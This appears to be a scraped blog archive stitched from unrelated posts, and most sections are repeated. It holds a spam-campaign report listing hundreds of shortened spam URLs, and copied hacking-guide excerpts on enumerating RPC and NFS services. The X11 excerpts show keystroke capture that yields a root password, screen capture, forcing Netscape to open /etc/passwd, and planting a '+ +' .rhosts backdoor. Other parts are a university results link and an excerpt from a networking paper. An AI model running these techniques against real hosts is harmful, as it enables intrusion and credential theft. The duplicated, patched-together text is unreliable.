Spammers Abusing URL Shortening Services
We've previously warned about the dangers of following "Tiny URLs" on Twitter. With only 140 characters to use in your message, many Twitterers use URL shortening services to save their precious characters. Unfortunately, for most people you have no idea where that click is going to take you until you click on it and get forwarded by the URL shortening service. Its a bit like playing Russian roulette. Click the shortened URLs, and you may get informative news stories, insightful blog articles, pornography, or a new virus!
At the UAB Spam Data Mine we've seen a few of these Tiny URLs used in spam, but now we have our first major campaign that is exploiting them in a highly organized way.
aafter.us
bit.ly
is.gd
jh.to
jtty.com
myurl.in
o.ly
phaze.me
sturly.com
tcbp.net
tlink.me
urltwitter.com
So far we've seen almost a thousand of these spam messages, and have encountered 453 unique URLs at this point. Here are the subjects that are being used in this spam campaign:
Subject: $10 free deposit
Subject: $5000 Jackpot waiting for you!
Subject: 200% bonus on every deposit
Subject: 75 and 90 Ball Bingo
Subject: Become A Bingo Hustler
Subject: Become A Winner Today
Subject: Become A Winner With Bingo
Subject: b-i-n-g-o for you!
Subject: Bingo has never been easier.
Subject: Bing-o Was Her Name-o
Subject: Do you like to play bingo online?
Subject: Enjoy Bingo Online
Subject: Ever wanted to play Bingo for Cash ?
Subject: Gamble online? Read me!
Subject: Gamble With Bingo
Subject: Gamble? Like to play online?
Subject: Hot 9-Real SLot Machines! $25,000 Jackpot
Subject: Hustle Online. Play Bingo.
Subject: Like Bingo? Win $
Subject: Nickel, Dime, Quarter, & High Roller Games!
Subject: Nightly Events for CASH Prizes
Subject: Online diplomas here.
Subject: Play Bing0 Online
Subject: Play Bingo Now
Subject: Play Bingo Today
Subject: play online
Subject: Play Online Now
Subject: Play Online, Win Today
Subject: Someone has invited you to a game of Bingo
Subject: Something For You. Play Online.
Subject: Vehicle Warranty - 60% off
Subject: Want to play bingo online and win CASH ?
Subject: Win With Bingo
Subject: You have been invited to a Bingo game!
We see this campaign as a dangerous precedence which could be followed by other spammers to make our efforts to block their spam more difficult. As one would expect, the spammer, in addition to cheating the affiliate program, and offering "probably illegal" gambling to his email recipients, is delivering his spam message through a world-wide botnet of compromised computers. Just in our spam samples, we have spam for this campaign sent from 698 different computers in 43 different countries around the world.
Afrinic countries of CI, MA, SD, ZA
APNIC countries of BD, HK, ID, IN, JP, KR, PK, TH, TW, VN
ARIN countries of US (only 6 machines)
LACNIC countries of AR, BR, CL, CO, MX, SV, VE
RIPENCC countries of AM, AZ, BY, DE, EU, GR, HR, HU, IL, IQ, IR, IT, KZ, MD, PL, PT, RO, RS, RU, UA, UZ
Despite a broad smattering of countries, 43% of our spam came from Brazil, 20% from Russia, 13% from the Ukraine, 7% from India, and 2% from Italy. No other country represented more than 1% of the spam we received in this campaign.
Here are the URLs that we have seen so far in this campaign:
http://aafter.us/0oysiA
http://aafter.us/15Exas
http://aafter.us/3d3V9e
http://aafter.us/459UeB
http://aafter.us/4fOecg
http://aafter.us/4R2udg
http://aafter.us/4YzvqA
http://aafter.us/6DvEsN
http://aafter.us/78Lj60
http://aafter.us/9GQEkZ
http://aafter.us/9TOYVb
http://aafter.us/A4Oc0S
http://aafter.us/AxwsYK
http://aafter.us/b9rkEe
http://aafter.us/bezEO3
http://aafter.us/BIyffd
http://aafter.us/ckqW55
http://aafter.us/cyHq06
http://aafter.us/D8kzvt
http://aafter.us/DBYJNk
http://aafter.us/dpJxBc
http://aafter.us/ew7332
http://aafter.us/FIDLQs
http://aafter.us/FJLPyM
http://aafter.us/fTJDW4
http://aafter.us/jptgOx
http://aafter.us/JwmKyP
http://aafter.us/jYg3j6
http://aafter.us/kdOH1o
http://aafter.us/knACii
http://aafter.us/motFQJ
http://aafter.us/n8quI5
http://aafter.us/N8U0Bq
http://aafter.us/P8o6Kn
http://aafter.us/PI3BvT
http://aafter.us/qDDkB6
http://aafter.us/QfSfkf
http://aafter.us/RH3z2F
http://aafter.us/rNqm6H
http://aafter.us/sEwQMU
http://aafter.us/siykT5
http://aafter.us/sY6RN1
http://aafter.us/TXgsXd
http://aafter.us/UxbBYV
http://aafter.us/vcmHnv
http://aafter.us/XwUWd3
http://aafter.us/YP4zHn
http://aafter.us/YUXbB4
http://aafter.us/ZjUAOw
http://bit.ly/10VJRX
http://bit.ly/11oYQ8
http://bit.ly/14egZi
http://bit.ly/15piKn
http://bit.ly/16aOsd
http://bit.ly/16iqi3
http://bit.ly/16temb
http://bit.ly/19AQlF
http://bit.ly/37LQeX
http://bit.ly/4mrqW9
http://bit.ly/8Tbvz
http://bit.ly/9K5r5
http://bit.ly/B0S1U
http://bit.ly/b3JyJ
http://bit.ly/E7hiD
http://bit.ly/eBlww
http://bit.ly/Ex5GL
http://bit.ly/EzZV4
http://bit.ly/FIolK
http://bit.ly/gj9Py
http://bit.ly/gQxNZ
http://bit.ly/ih7Di
http://bit.ly/iwdpY
http://bit.ly/joj8y
http://bit.ly/lhPp7
http://bit.ly/MOXP7
http://bit.ly/N3iVs
http://bit.ly/Q4XY0
http://bit.ly/q7EwA
http://bit.ly/RWnFc
http://bit.ly/tdLyV
http://bit.ly/TEXC4
http://bit.ly/tSW62
http://bit.ly/ttrZ5
http://bit.ly/tvZ0h
http://bit.ly/V2q7R
http://bit.ly/Ve1jJ
http://bit.ly/VI7n6
http://bit.ly/Vs7Tb
http://bit.ly/xiUSr
http://bit.ly/xJEcE
http://bit.ly/xjIii
http://bit.ly/YdVa5
http://is.gd/1xL2e
http://is.gd/1xL2f
http://is.gd/1xL2g
http://is.gd/1xL2h
http://is.gd/1xL2i
http://is.gd/1xL2k
http://is.gd/1xL4B
http://is.gd/1xL4E
http://is.gd/1xL4F
http://is.gd/1xL4G
http://is.gd/1xL4L
http://is.gd/1xL6e
http://is.gd/1xL6m
http://is.gd/1xL6o
http://is.gd/1xL6r
http://is.gd/1xL6u
http://is.gd/1xL6z
http://is.gd/1xL8H
http://is.gd/1xL8t
http://is.gd/1xLaB
http://is.gd/1xLaE
http://is.gd/1xLaK
http://is.gd/1xLaO
http://is.gd/1xLaP
http://is.gd/1xLaW
http://is.gd/1xLcS
http://is.gd/1xLdc
http://is.gd/1xLdg
http://is.gd/1xLdh
http://is.gd/1xLdi
http://is.gd/1xLeX
http://is.gd/1xLff
http://is.gd/1xLfG
http://is.gd/1xLfx
http://jh.to/1obuti
http://jh.to/3ulofu
http://jh.to/4alo9u
http://jh.to/4u0axo
http://jh.to/4u9o8u
http://jh.to/5ayoja
http://jh.to/9eyisi
http://jh.to/9i8ika
http://jh.to/do0eba
http://jh.to/do9ihu
http://jh.to/ha6e0u
http://jh.to/je2a9e
http://jh.to/le8iha
http://jh.to/li3iju
http://jh.to/lozi1i
http://jh.to/rokoye
http://jh.to/vetagi
http://jh.to/xu5onu
http://jh.to/yekife
http://jh.to/yilizo
http://jh.to/zeximo
http://jtty.com/05i
http://jtty.com/0g8k
http://jtty.com/640z
http://jtty.com/6g0
http://jtty.com/90jm
http://jtty.com/aeuw
http://jtty.com/afn2
http://jtty.com/alr9
http://jtty.com/bhsv
http://jtty.com/cgt2
http://jtty.com/clx8
http://jtty.com/cn69
http://jtty.com/dhs9
http://jtty.com/dqr6
http://jtty.com/e2b0
http://jtty.com/e589
http://jtty.com/ehlm
http://jtty.com/ejn3
http://jtty.com/ely7
http://jtty.com/eu27
http://jtty.com/fruy
http://jtty.com/gkot
http://jtty.com/hklq
http://jtty.com/htx3
http://jtty.com/ilq3
http://jtty.com/ilw4
http://jtty.com/ix12
http://jtty.com/ixz6
http://jtty.com/jk17
http://jtty.com/knwz
http://jtty.com/lw56
http://jtty.com/lwz2
http://jtty.com/nrz1
http://jtty.com/ouxz
http://jtty.com/rsv9
http://jtty.com/tyz6
http://jtty.com/tz68
http://jtty.com/vyz2
http://jtty.com/wpz0
http://jtty.com/wt0h
http://jtty.com/y0q3
http://myurl.in/2SA9A
http://myurl.in/3Kgq3
http://myurl.in/3txkM
http://myurl.in/50WTX
http://myurl.in/6MUXd
http://myurl.in/6rP1t
http://myurl.in/8m00V
http://myurl.in/8QnMd
http://myurl.in/9ml8L
http://myurl.in/AhDeA
http://myurl.in/AKF1g
http://myurl.in/AMJBY
http://myurl.in/BCD7U
http://myurl.in/BM1RA
http://myurl.in/CcSAD
http://myurl.in/cooWR
http://myurl.in/drm2U
http://myurl.in/e0LIu
http://myurl.in/EcZlr
http://myurl.in/Ezbrh
http://myurl.in/Fk2Qs
http://myurl.in/H6xsv
http://myurl.in/HbY51
http://myurl.in/HiUfB
http://myurl.in/ivqVE
http://myurl.in/kr0Xn
http://myurl.in/L62hH
http://myurl.in/LUk5g
http://myurl.in/NWsMe
http://myurl.in/oa5Zo
http://myurl.in/Oq8Jj
http://myurl.in/pWVr8
http://myurl.in/q6qsq
http://myurl.in/rhChK
http://myurl.in/th2Gr
http://myurl.in/TSR8k
http://myurl.in/u8jyb
http://myurl.in/UzmYY
http://myurl.in/vppYC
http://myurl.in/wZoeF
http://myurl.in/XAj2y
http://myurl.in/xIIll
http://myurl.in/Y2Dc7
http://myurl.in/YbCtF
http://myurl.in/YG2Ny
http://myurl.in/yl4s2
http://myurl.in/yxj2l
http://o.ly/qT1
http://o.ly/qT3
http://o.ly/qT4
http://o.ly/qT5
http://o.ly/qT6
http://o.ly/qT7
http://o.ly/qT8
http://o.ly/qT9
http://o.ly/qTA
http://o.ly/qTb
http://o.ly/qTC
http://o.ly/qTH
http://o.ly/qTJ
http://o.ly/qTK
http://o.ly/qTm
http://o.ly/qTn
http://o.ly/qTO
http://o.ly/qTR
http://o.ly/qTS
http://o.ly/qTU
http://o.ly/qTV
http://o.ly/qTW
http://o.ly/qTX
http://o.ly/qYF
http://o.ly/qYh
http://o.ly/qYi
http://o.ly/qYm
http://o.ly/qYn
http://o.ly/qYo
http://o.ly/qYp
http://o.ly/qYq
http://o.ly/qYS
http://o.ly/qYt
http://o.ly/qYv
http://o.ly/qYw
http://o.ly/qYx
http://o.ly/qYy
http://phaze.me/0994
http://phaze.me/0cjw
http://phaze.me/0r08
http://phaze.me/11c7
http://phaze.me/1j84
http://phaze.me/1jy4
http://phaze.me/2dsc
http://phaze.me/2s08
http://phaze.me/2tq6
http://phaze.me/2xzx
http://phaze.me/3k5z
http://phaze.me/3r3k
http://phaze.me/3trj
http://phaze.me/3v4x
http://phaze.me/4kdb
http://phaze.me/4q59
http://phaze.me/5314
http://phaze.me/5jb1
http://phaze.me/6gjq
http://phaze.me/6n6p
http://phaze.me/836x
http://phaze.me/ckyd
http://phaze.me/d4nf
http://phaze.me/dj19
http://phaze.me/ffrn
http://phaze.me/fn86
http://phaze.me/g30w
http://phaze.me/g68v
http://phaze.me/gm36
http://phaze.me/hwjf
http://phaze.me/jh88
http://phaze.me/jrny
http://phaze.me/k12t
http://phaze.me/m9b6
http://phaze.me/nq7c
http://phaze.me/nt1x
http://phaze.me/nz1b
http://phaze.me/p0q0
http://phaze.me/pkkt
http://phaze.me/rm2y
http://phaze.me/t4wq
http://phaze.me/tqn0
http://phaze.me/v1b0
http://phaze.me/vm98
http://phaze.me/vmtm
http://phaze.me/vqqw
http://phaze.me/w736
http://phaze.me/xptc
http://phaze.me/yqnd
http://phaze.me/zh2v
http://sturly.com/aal0
http://sturly.com/aal1
http://sturly.com/aal2
http://sturly.com/aal5
http://sturly.com/aal6
http://sturly.com/aalm
http://sturly.com/aalq
http://sturly.com/aalr
http://sturly.com/aals
http://sturly.com/aalv
http://sturly.com/aalw
http://sturly.com/aalx
http://sturly.com/aaly
http://sturly.com/aalz
http://sturly.com/aama
http://sturly.com/aamb
http://sturly.com/aamc
http://sturly.com/aame
http://sturly.com/aamf
http://sturly.com/aamg
http://sturly.com/aamh
http://sturly.com/aami
http://sturly.com/aamk
http://sturly.com/aaml
http://sturly.com/aams
http://sturly.com/aamu
http://tcbp.net/s9
http://tcbp.net/sa
http://tcbp.net/sB
http://tcbp.net/sc
http://tcbp.net/sd
http://tcbp.net/sE
http://tcbp.net/sF
http://tcbp.net/sg
http://tcbp.net/sh
http://tcbp.net/sI
http://tcbp.net/sj
http://tcbp.net/sk
http://tcbp.net/sl
http://tcbp.net/sN
http://tcbp.net/sQ
http://tcbp.net/sS
http://tcbp.net/st
http://tcbp.net/sW
http://tcbp.net/sX
http://tcbp.net/sY
http://tcbp.net/t0
http://tcbp.net/t2
http://tcbp.net/t3
http://tcbp.net/t5
http://tcbp.net/t7
http://tcbp.net/t8
http://tcbp.net/t9
http://tcbp.net/ta
http://tcbp.net/tb
http://tcbp.net/tc
http://tcbp.net/te
http://tcbp.net/ti
http://tcbp.net/tj
http://tcbp.net/tk
http://tlink.me/1499
http://tlink.me/1500
http://tlink.me/1501
http://tlink.me/1502
http://tlink.me/1503
http://tlink.me/1504
http://tlink.me/1505
http://tlink.me/1507
http://tlink.me/1508
http://tlink.me/1510
http://tlink.me/1514
http://tlink.me/1515
http://tlink.me/1516
http://tlink.me/1517
http://tlink.me/1518
http://tlink.me/1519
http://tlink.me/1520
http://tlink.me/1525
http://tlink.me/1526
http://tlink.me/1527
http://tlink.me/1529
http://tlink.me/1530
http://tlink.me/1532
http://tlink.me/1533
http://tlink.me/1534
http://tlink.me/1537
http://tlink.me/1538
http://tlink.me/1540
http://tlink.me/1542
http://tlink.me/1543
http://tlink.me/1545
http://tlink.me/1549
http://tlink.me/1550
http://tlink.me/1554
http://tlink.me/1555
http://tlink.me/1557
http://tlink.me/1560
http://tlink.me/1563
http://tlink.me/1564
http://tlink.me/1565
http://tlink.me/1566
http://tlink.me/1567
http://tlink.me/1569
http://tlink.me/1570
http://tlink.me/1571
http://tlink.me/1572
http://tlink.me/1573
http://tlink.me/1574
http://tlink.me/1575
http://tlink.me/1576
http://urltwitter.com/1ipevu
http://urltwitter.com/2i7isa
http://urltwitter.com/4aza2o
http://urltwitter.com/4otifu
http://urltwitter.com/5ireri
http://urltwitter.com/6eyoco
http://urltwitter.com/6i3eko
http://urltwitter.com/bi3e7o
http://urltwitter.com/bixaso
http://urltwitter.com/fale2e
http://urltwitter.com/gu3eto
http://urltwitter.com/jafabu
http://urltwitter.com/jarewa
http://urltwitter.com/kedopu
http://urltwitter.com/kuno6o
http://urltwitter.com/me3ajo
http://urltwitter.com/nasozi
http://urltwitter.com/so3afi
http://urltwitter.com/vido6a
http://urltwitter.com/wulule
http://urltwitter.com/yucazo
Tuesday, August 24, 2010
RPC & portmapper (111 TCP + other UDP)
RPC & portmapper (111 TCP + other UDP)
The portmapper service works like this - I would connect to the portmapper port and state that I want to use a specific RPC service - the portmapper would then reply and tell me which port to use. (RPC is for remote procedure call - it's like executing a function on a remote machine, and getting the output back). The reverse is also true - if I want to write a RPC service, I must register it with the portmapper, so that the client that wants the service knows on what port I am listening. So what is the bottom line?
I could save myself a lot of portscanning trouble and just ask the portmapper what services are running on which ports. Now obviously the portmapper service itself must be running. So I might be testing for machines that have port 111 open first. Assuming that I now have a machine with an open portmapper port the following is done:
> rpcinfo -p 210.xxx.96.151
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100001 1 udp 1038 rstatd
100001 2 udp 1038 rstatd
100001 3 udp 1038 rstatd
100002 1 udp 1040 rusersd
100002 2 udp 1040 rusersd
100008 1 udp 1042 walld
100012 1 udp 1044 sprayd
150001 1 udp 1046 pcnfsd
- 61 - Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
150001 2 udp 1046 pcnfsd
100083 1 tcp 1026 ttdbserver
100068 2 udp 1048 cmsd
100068 3 udp 1048 cmsd
100068 4 udp 1048 cmsd
100068 5 udp 1048 cmsd
100003 2 udp 2049 nfs
100005 1 udp 785 mountd
100005 1 tcp 787 mountd
100024 1 udp 989 status
100024 1 tcp 991 status
100021 1 tcp 840 nlockmgr
100021 1 udp 842 nlockmgr
100021 3 tcp 845 nlockmgr
100021 3 udp 847 nlockmgr
100020 1 udp 850 llockmgr
100020 1 tcp 852 llockmgr
100021 2 tcp 855 nlockmgr
1342177279 3 tcp 1067
1342177279 1 tcp 1067
From this we can which RPC services the host is running. A very interesting service see running is NFS (network file system). Maybe the host is exporting some interesting NFS "shares"? Let us have a look:
> showmount -a 210.xxx.96.151
All mount points on 210.xxx.96.151:
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
We can see that this host is only export the shares to specific machines (in Taiwan) - not to the rest of the world - so it is pretty useless to even try to mount these "shares" on our host. Maybe I'll look for a host with some public shares, and then we'll look at mounting those. OK...here goes:
> showmount -e 128.xxx.135.52
Exports list on 128.xxx.135.52:
/install_2.6 Everyone
/export/install Everyone
/psrc rcd_hosts
/usr/share/opt rcd_hosts xxx.edu
/usr/share/opt2.5 rcd_hosts
/scratch7 rcd_hosts
/pucc rcd_hosts xxx.edu
/home/helios/u52 rcd_all
/home/helios/u51 rcd_all
# mount_nfs 128.xxx.135.52:/export/install /mnt
# cd /mnt
# ls
Let us move on to some of the other services. One of the other services that you would notice is "rusers". Rusers is the same as finger - there ain't that many tricks with rusers, but it would give you a list of users active on the host. It very useful when the finger service is not running, or when it is blocked, and you need some usernames.
> rusers -al 210.xxx.96.151
Damn - no users logged on. Let us see if we can't find a host somewhere on the 'net with users logged on:
# rusers -al 128.xxx.135.109
wgw xxx.edu:console Sep 19 16:11 :53 (:0)
(confirming:)
> finger @128.xxx.135.109
[128.xxx.135.109]
Login Name TTY Idle When Where
wgw William Wolber console 1:06 Tue 09:11 :0
Another RPC service that is quite cute is the rstatd server. This service gives some (kinda useless) information such as uptime and load:
> rup 210.xxx.96.151
210.xxx.96.151 1:17am up 4 days, 22:14, load average: 0.00 0.00 0.01
Should I wish to, I could write a message to all the users logged in on the host using the rwall command (now... I don't want to do that would I, but it would look like this):
>rwall 210.xxx.96.151
Greetings from South Africa!
^D
>
This command would write above message to the consoles of all users connected to the host. Using this command with loops has obvious annoying effects.
Another RPC service that is not mentioned here is the Yellow Pages system (YP). YP was quite popular at some stage in large corporations and universities, but its rare to see it today. For a very nice discussion on ways to get juicy information from YP the best document must be Dan Farmer's "Improving the Security of Your Site by Breaking Into it" - you can find it here (http://www.ussrback.com/docs/papers/unix/farmer.txt).
The more serious problems with RPC services are that some of them are exploitable. The "ttdbserver" and "cmsd" services have known problems that would allow an attacker to execute any command on the host. These exploits are very OS dependent, but also a very real...check your local exploit database for the goodies.
The portmapper service works like this - I would connect to the portmapper port and state that I want to use a specific RPC service - the portmapper would then reply and tell me which port to use. (RPC is for remote procedure call - it's like executing a function on a remote machine, and getting the output back). The reverse is also true - if I want to write a RPC service, I must register it with the portmapper, so that the client that wants the service knows on what port I am listening. So what is the bottom line?
I could save myself a lot of portscanning trouble and just ask the portmapper what services are running on which ports. Now obviously the portmapper service itself must be running. So I might be testing for machines that have port 111 open first. Assuming that I now have a machine with an open portmapper port the following is done:
> rpcinfo -p 210.xxx.96.151
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100001 1 udp 1038 rstatd
100001 2 udp 1038 rstatd
100001 3 udp 1038 rstatd
100002 1 udp 1040 rusersd
100002 2 udp 1040 rusersd
100008 1 udp 1042 walld
100012 1 udp 1044 sprayd
150001 1 udp 1046 pcnfsd
- 61 - Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]
150001 2 udp 1046 pcnfsd
100083 1 tcp 1026 ttdbserver
100068 2 udp 1048 cmsd
100068 3 udp 1048 cmsd
100068 4 udp 1048 cmsd
100068 5 udp 1048 cmsd
100003 2 udp 2049 nfs
100005 1 udp 785 mountd
100005 1 tcp 787 mountd
100024 1 udp 989 status
100024 1 tcp 991 status
100021 1 tcp 840 nlockmgr
100021 1 udp 842 nlockmgr
100021 3 tcp 845 nlockmgr
100021 3 udp 847 nlockmgr
100020 1 udp 850 llockmgr
100020 1 tcp 852 llockmgr
100021 2 tcp 855 nlockmgr
1342177279 3 tcp 1067
1342177279 1 tcp 1067
From this we can which RPC services the host is running. A very interesting service see running is NFS (network file system). Maybe the host is exporting some interesting NFS "shares"? Let us have a look:
> showmount -a 210.xxx.96.151
All mount points on 210.xxx.96.151:
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
We can see that this host is only export the shares to specific machines (in Taiwan) - not to the rest of the world - so it is pretty useless to even try to mount these "shares" on our host. Maybe I'll look for a host with some public shares, and then we'll look at mounting those. OK...here goes:
> showmount -e 128.xxx.135.52
Exports list on 128.xxx.135.52:
/install_2.6 Everyone
/export/install Everyone
/psrc rcd_hosts
/usr/share/opt rcd_hosts xxx.edu
/usr/share/opt2.5 rcd_hosts
/scratch7 rcd_hosts
/pucc rcd_hosts xxx.edu
/home/helios/u52 rcd_all
/home/helios/u51 rcd_all
# mount_nfs 128.xxx.135.52:/export/install /mnt
# cd /mnt
# ls
Let us move on to some of the other services. One of the other services that you would notice is "rusers". Rusers is the same as finger - there ain't that many tricks with rusers, but it would give you a list of users active on the host. It very useful when the finger service is not running, or when it is blocked, and you need some usernames.
> rusers -al 210.xxx.96.151
Damn - no users logged on. Let us see if we can't find a host somewhere on the 'net with users logged on:
# rusers -al 128.xxx.135.109
wgw xxx.edu:console Sep 19 16:11 :53 (:0)
(confirming:)
> finger @128.xxx.135.109
[128.xxx.135.109]
Login Name TTY Idle When Where
wgw William Wolber console 1:06 Tue 09:11 :0
Another RPC service that is quite cute is the rstatd server. This service gives some (kinda useless) information such as uptime and load:
> rup 210.xxx.96.151
210.xxx.96.151 1:17am up 4 days, 22:14, load average: 0.00 0.00 0.01
Should I wish to, I could write a message to all the users logged in on the host using the rwall command (now... I don't want to do that would I, but it would look like this):
>rwall 210.xxx.96.151
Greetings from South Africa!
^D
>
This command would write above message to the consoles of all users connected to the host. Using this command with loops has obvious annoying effects.
Another RPC service that is not mentioned here is the Yellow Pages system (YP). YP was quite popular at some stage in large corporations and universities, but its rare to see it today. For a very nice discussion on ways to get juicy information from YP the best document must be Dan Farmer's "Improving the Security of Your Site by Breaking Into it" - you can find it here (http://www.ussrback.com/docs/papers/unix/farmer.txt).
The more serious problems with RPC services are that some of them are exploitable. The "ttdbserver" and "cmsd" services have known problems that would allow an attacker to execute any command on the host. These exploits are very OS dependent, but also a very real...check your local exploit database for the goodies.
Monday, August 23, 2010
ANNA UNIVERSITY TIRUNELVELI PG PROGRAMME RESULTS:
anna university P.G programme results..
regulation 2007 and 2008:
http://218.248.20.134/PG10/PGIII.aspx
regulation 2009:
http://218.248.20.134/PG1X/PGI.aspx
regulation 2007 and 2008:
http://218.248.20.134/PG10/PGIII.aspx
regulation 2009:
http://218.248.20.134/PG1X/PGI.aspx
Friday, August 20, 2010
Packet-Level Parallelism
Packet-Level Parallelism
Times given are in megabits per second for several protocol stacks. Our baseline
Internet stack consists of TCP/IP/FDDI, representing
protocol processing without any security. A second stack is
an Internet stack with MD5 between TCP and IP, representing
the work done for an application that requires authentication
and integrity but no confidentiality. Our third stack
uses DES above TCP and MD5 below TCP, which supports
both confidentiality and integrity. Our fourth stack is the
same as the third, except that we use triple-DES instead of
DES.
These throughputs were measured on our 12-processor
Challenge machine, using a single TCP connection with 4
KB packets. For these and all subsequent graphs, each data
point is the average of 10 runs, where a run consists of
measuring the steady-state throughput for 30 seconds, after
an initial 30 second warmup period. Throughput graphs
include 90 percent confidence intervals.
The baseline speed for the send-side TCP stack is roughly 138 Mbits/sec. Adding MD5 to the stack reduces throughput by nearly an order of magnitude, to
a mere 18 Mbits/sec2 . Adding DES on top of TCP reduces
throughput nearly 2 orders of magnitude, to 4.6 Mbits/sec.
Using Triple-DES is 3 times slower at 1.5 Mbits/sec.
Figure 4 shows the corresponding relative speedup for
the send-side tests, where speedup is throughput normalized
relative to the uniprocessor throughput for the appropriate
stack. The theoretical ideal linear speedup is included for
comparison. Previous work [3, 24] has shown limited performance
gains when using packet-level parallelism for a
single TCP connection, barring any other protocol processing,
and this is reflected by the baseline TCP/IP stack’s
minimal speedup. This is because manipulating a TCP connection’s
state is large relative to the IP and FDDI processing
and must occur inside a single locked, serial component. Of
course, throughput can be improved by using multiple connections.
However, as more compute-intensive cryptographic protocols
are used, while the throughput goes down, the relative
speedup improves. For example, the MD5 stack achieves a
speedup of 8 with 12 processors, and the DES and Triple-
DES stacks produce very close to linear speedup
Times given are in megabits per second for several protocol stacks. Our baseline
Internet stack consists of TCP/IP/FDDI, representing
protocol processing without any security. A second stack is
an Internet stack with MD5 between TCP and IP, representing
the work done for an application that requires authentication
and integrity but no confidentiality. Our third stack
uses DES above TCP and MD5 below TCP, which supports
both confidentiality and integrity. Our fourth stack is the
same as the third, except that we use triple-DES instead of
DES.
These throughputs were measured on our 12-processor
Challenge machine, using a single TCP connection with 4
KB packets. For these and all subsequent graphs, each data
point is the average of 10 runs, where a run consists of
measuring the steady-state throughput for 30 seconds, after
an initial 30 second warmup period. Throughput graphs
include 90 percent confidence intervals.
The baseline speed for the send-side TCP stack is roughly 138 Mbits/sec. Adding MD5 to the stack reduces throughput by nearly an order of magnitude, to
a mere 18 Mbits/sec2 . Adding DES on top of TCP reduces
throughput nearly 2 orders of magnitude, to 4.6 Mbits/sec.
Using Triple-DES is 3 times slower at 1.5 Mbits/sec.
Figure 4 shows the corresponding relative speedup for
the send-side tests, where speedup is throughput normalized
relative to the uniprocessor throughput for the appropriate
stack. The theoretical ideal linear speedup is included for
comparison. Previous work [3, 24] has shown limited performance
gains when using packet-level parallelism for a
single TCP connection, barring any other protocol processing,
and this is reflected by the baseline TCP/IP stack’s
minimal speedup. This is because manipulating a TCP connection’s
state is large relative to the IP and FDDI processing
and must occur inside a single locked, serial component. Of
course, throughput can be improved by using multiple connections.
However, as more compute-intensive cryptographic protocols
are used, while the throughput goes down, the relative
speedup improves. For example, the MD5 stack achieves a
speedup of 8 with 12 processors, and the DES and Triple-
DES stacks produce very close to linear speedup
Thursday, August 5, 2010
X11 (6000 TCP)
X11 (6000 TCP)
X11 displays are (normally) protected on a network level - that is - there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Control for clients to connect to the server is facilitated with the "xhost" command. By default it is set up in a way that nobody can connect to the display - default deny. As soon as programs are sharing the display (exporting an xterm to your display from another host or whatever) the user of the display have to add the IP number or DNS name of the client that wish to connect by running the command "xhost +". In theory this works perfectly nice, but in the real world people tend to just enter "xhost +" which allows anyone to connect to the display.
A host that is open for anyone to connect to the display is risking a lot, and could possibly be compromised. There are a few nice things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that is entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:
xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<>P 196.37.xxx.1
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also be "copied" - the root window (the main window) can be copied, and displayed. Each window have a unique ID - you can specify which window you want to copy, but for a start let us get the root window:
xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
xv /tmp/screendump
We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver - bad luck - use finger to see when someone is active. To get a list of windows that are open on the display you might want to issue the command:
xwininfo -display -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see the other screen listed (you won't see it with xwd). With a bit of luck you get a Netscape browser open. To get Netscape open on an open X11 display is very good news as you can remotely control Netscape. Fancy telling Netscape to open /etc/passwd and doing another screen capture? Here is how :
netscape -display -remote 'openFile(/etc/passwd)'
xwd -display -root -silent -out /tmp/netscape_
xv /tmp/netscape
You can even tell Netscape to write files. It won't work trying to overwrite files - you will find a nasty Netscape popup, but you can write files that do not exist. You could create a page with "+ +" on it, redirect the browser to the page, and, if Netscape is running as root, save it to /.rhosts. Be sure to have a close look at http://home.netscape.com/newsref/std/x-remote.html if you find an open X11 running Netscape.
In theory you could also send keystrokes to an open X display. I found the program "xpusher.c" at , fiddled around with it, but it does not seem to work. There might be other programs around.
X11 displays are (normally) protected on a network level - that is - there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Control for clients to connect to the server is facilitated with the "xhost" command. By default it is set up in a way that nobody can connect to the display - default deny. As soon as programs are sharing the display (exporting an xterm to your display from another host or whatever) the user of the display have to add the IP number or DNS name of the client that wish to connect by running the command "xhost +
A host that is open for anyone to connect to the display is risking a lot, and could possibly be compromised. There are a few nice things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that is entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:
xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also be "copied" - the root window (the main window) can be copied, and displayed. Each window have a unique ID - you can specify which window you want to copy, but for a start let us get the root window:
xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
xv /tmp/screendump
We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver - bad luck - use finger to see when someone is active. To get a list of windows that are open on the display you might want to issue the command:
xwininfo -display
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
